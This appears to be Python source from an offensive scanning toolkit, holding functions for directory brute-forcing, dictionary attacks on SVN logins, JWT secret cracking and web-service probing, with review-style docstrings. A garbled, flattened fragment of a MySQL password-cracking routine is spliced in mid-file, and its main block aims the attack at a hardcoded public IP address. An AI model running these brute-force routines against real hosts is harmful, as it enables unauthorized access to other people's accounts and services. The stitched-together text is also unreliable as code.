def scan_file_plus(self):
    """Build the request list from ``self.wordsList_plus`` and start scanning.

    Each line read from ``self.wordsList_plus`` is stripped, passed through
    ``formatPath`` and appended to ``self.url``. The resulting list is handed
    to ``self.scan`` through a ``MyThreadPool``, which is started before
    returning. Nothing is returned.
    """
    targets = []
    for entry in readFile(self.wordsList_plus):
        targets.append(self.url + formatPath(entry.strip()))

    # NOTE(review): self.maxconnections is presumably the pool's concurrency
    # cap -- confirm against MyThreadPool.
    pool = MyThreadPool(self.scan, targets, self.maxconnections)
    pool.start()
def scan_path(self):
    """Build the request list from the cached path wordlist and start scanning.

    Each line read from ``self.cachePath_txt`` is stripped, passed through
    ``formatPath`` and appended to ``self.url``. The resulting list is handed
    to ``self.scan`` through a ``MyThreadPool``, which is started before
    returning. Nothing is returned.
    """
    cached_entries = readFile(self.cachePath_txt)
    targets = list(
        map(lambda entry: self.url + formatPath(entry.strip()), cached_entries)
    )

    # NOTE(review): self.maxconnections is presumably the pool's concurrency
    # cap -- confirm against MyThreadPool.
    pool = MyThreadPool(self.scan, targets, self.maxconnections)
    pool.start()
def weakPwdCrack_Svn(ip, user_list=None, pwd_list=None, resultFile=None):
    """Check the SVN service at ``ip`` for weak user/password pairs.

    Args:
        ip: Host passed to ``connect_svn``.
        user_list: User names to test; defaults to the lines of
            ``payload/dict/user_database.txt`` under ``base_root``.
        pwd_list: Candidate passwords; defaults to the lines of
            ``payload/dict/passwd_top10.txt`` under ``base_root``.
        resultFile: File that accepted pairs are written to; defaults to a
            timestamped file under ``result/`` in ``base_root``.

    Two passes are made over ``user_list``: first with the candidates
    returned by ``getUserNameAlikePwd`` for each user, then with ``pwd_list``.
    Each pass starts one ``MyThreadPool`` per user.

    NOTE(review): every candidate is printed to stdout and every accepted
    pair is written to ``resultFile`` in plaintext, so both the console log
    and the result file hold credentials and need to be protected as such.
    """
    if resultFile == None:
        resultFile = '{}result/{}_{}.txt'.format(base_root, ip, time.time())
    if user_list == None:
        default_users = '{}payload/dict/user_database.txt'.format(base_root)
        user_list = readFile(default_users)
    if pwd_list == None:
        default_pwds = '{}payload/dict/passwd_top10.txt'.format(base_root)
        pwd_list = readFile(default_pwds)

    # Worker that the thread pool calls once per candidate password.
    def connectSvn_forThread(passwd, otherArgs):
        ip = otherArgs['ip']
        user = otherArgs['user']
        passwd = passwd.strip()
        print('crack user:[{}]/pwd:[{}]'.format(user, passwd))
        (flag, userAndpwd) = connect_svn(ip, user, password=passwd)
        if not flag:
            return
        print('[FOUND] user:[{}]/pwd:[{}],result out is [{}]'.format(
            user, passwd, userAndpwd))
        # Writes from several threads can race on the result file; the sleeps
        # on either side only make a collision less likely.
        # NOTE(review): a sleep is not synchronization -- concurrent writes
        # can still interleave.
        time.sleep(1.5)
        writeFile(resultFile, '[user:[{}]/pwd:[{}]\r\n'.format(user, passwd))
        time.sleep(1.5)

    # Pass 1: passwords derived from the user name.
    for raw_user in user_list:
        name = raw_user.strip()
        name_based_pwds = getUserNameAlikePwd(name)
        worker_args = {'ip': ip, 'user': name}
        pool = MyThreadPool(connectSvn_forThread,
                            name_based_pwds,
                            other_args=worker_args)
        pool.start()

    # Pass 2: passwords from the dictionary.
    for raw_user in user_list:
        name = raw_user.strip()
        worker_args = {'ip': ip, 'user': name}
        pool = MyThreadPool(connectSvn_forThread,
                            pwd_list,
                            other_args=worker_args)
        pool.start()
def weakPwdCrack_jwt(token, code='ascii', key_list=None, resultFile=None):
    """Test a JWT against a dictionary of candidate keys and record the result.

    Args:
        token: The token, passed to ``jwtCrack`` as ``other_args``.
        code: Not read anywhere in this function.
        key_list: Candidate keys; defaults to the lines of
            ``payload/dict/passwd_1w.txt`` under ``base_root``.
        resultFile: Output file; defaults to a timestamped ``jwt_*.txt``
            under ``result/`` in ``base_root``.

    ``jwtCrack`` is run over ``key_list`` through a ``MyProcessPool`` and the
    pool's ``result`` attribute is written to ``resultFile``.

    NOTE(review): the '[FOUND]' line is written whatever ``result`` holds, so
    the file's existence alone does not show that a key matched -- confirm
    what MyProcessPool leaves in ``result`` when nothing matches.
    """
    if key_list == None:
        default_keys = '{}payload/dict/passwd_1w.txt'.format(base_root)
        key_list = readFile(default_keys)
    if resultFile == None:
        resultFile = '{}result/jwt_{}.txt'.format(base_root, time.time())

    pool = MyProcessPool(jwtCrack, key_list, other_args=token)
    pool.start()

    report_line = '[FOUND] key:{}'.format(pool.result)
    writeFile(resultFile, report_line)
def getWeb(ip_port_list=None, targetFile=None, resultFile=None):
    """Run ``isWeb`` over a list of targets and write the pool's result.

    Args:
        ip_port_list: Targets handed to ``isWeb``; replaced by the contents
            of ``targetFile`` when that argument is truthy.
        targetFile: Optional file to read the target list from.
        resultFile: Output file; defaults to a timestamped ``web_*.txt``
            under ``result/`` in ``base_root``.

    NOTE(review): when neither ``ip_port_list`` nor ``targetFile`` is given,
    ``None`` is passed to MyThreadPool -- confirm how the pool handles that.
    """
    if targetFile:
        ip_port_list = readFile(targetFile)
    if resultFile == None:
        resultFile = '{}result/web_{}.txt'.format(base_root, time.time())

    pool = MyThreadPool(isWeb, ip_port_list)
    pool.start()

    report = '{}'.format(pool.result)
    writeFile(resultFile, report)
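def creatCachePathPayload(self):
    """Rebuild the cached path and file wordlists.

    Steps, in order:

    1. Clear the cache files via ``self.clearCacheTxt()``.
    2. Write every stripped line of ``self.wordsFile`` and every entry of
       ``self.keyWords`` to ``self.cachePath_txt``.
    3. Write ``<name>.<extension>`` to ``self.cacheFile_txt`` for every
       name from the same two sources and every extension returned by
       ``self.getExtensionList()``.
    4. Run ``getRemoveDupFile`` on both cache files, clear the caches
       again, and move each ``<cache>.rd`` file over its cache file.

    Errors while writing either cache are printed and otherwise ignored, as
    are errors while moving the ``.rd`` files into place.
    """
    self.clearCacheTxt()
    extensionList = self.getExtensionList()

    # Build the path cache file.
    try:
        for fileName in readFile(self.wordsFile):
            writeFile(self.cachePath_txt, '{}\n'.format(fileName.strip()))
        for fileName in self.keyWords:
            writeFile(self.cachePath_txt, '{}\n'.format(fileName))
    except Exception as e:
        print(e)

    # Build the file cache file (name x extension).
    try:
        for fileName in readFile(self.wordsFile):
            for exten in extensionList:
                writeFile(
                    self.cacheFile_txt,
                    '{}.{}\n'.format(fileName.strip(), exten.strip()))
        for fileName in self.keyWords:
            for exten in extensionList:
                writeFile(
                    self.cacheFile_txt,
                    '{}.{}\n'.format(fileName.strip(), exten.strip()))
    except Exception as e:
        print(e)

    # NOTE(review): getRemoveDupFile presumably writes its output next to the
    # input as '<name>.rd' -- the moves below rely on that.
    getRemoveDupFile(self.cachePath_txt)
    getRemoveDupFile(self.cacheFile_txt)
    self.clearCacheTxt()

    # Move the de-duplicated files into place without a shell. The original
    # interpolated the paths into an 'mv' command line unquoted, so a cache
    # path containing spaces or shell metacharacters was split or interpreted
    # by the shell.
    for cachePath in (self.cachePath_txt, self.cacheFile_txt):
        try:
            os.replace(cachePath + '.rd', cachePath)
        except OSError as e:
            # A failed 'mv' did not abort the original either; keep going.
            print(e)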
'port': port, 'database': database } crackFtpThread = MyThreadPool(connectMysql_forThread, userNameAlikePwd, other_args=otherArgs) crackFtpThread.start() # 爆破字典里面的密码 for user in user_list: user = user.strip() otherArgs = { 'ip': ip, 'user': user, 'port': port, 'database': database } crackFtpThread = MyThreadPool(connectMysql_forThread, pwd_list, other_args=otherArgs) crackFtpThread.start() if __name__ == '__main__': last_time = time.time() # pwd_list = readFile('{}payload/dict/passwd_1w.txt'.format(base_root)) pwd_list = readFile('{}payload/dict/passwd_top10.txt'.format(base_root)) ip = '167.88.178.54' # 扫描目标 weakPwdCrack_mysql(ip, pwd_list=pwd_list) print('total time is {}'.format(time.time() - last_time))
def file_dedu(target_file, result_file):
    """Write the de-duplicated entries of ``target_file`` to ``result_file``.

    The entries returned by ``readFile(target_file)`` are passed through
    ``deduplication_list`` and each remaining entry is written with
    ``writeFile`` in the order that helper returns them.
    """
    unique_entries = deduplication_list(readFile(target_file))
    for entry in unique_entries:
        writeFile(result_file, entry)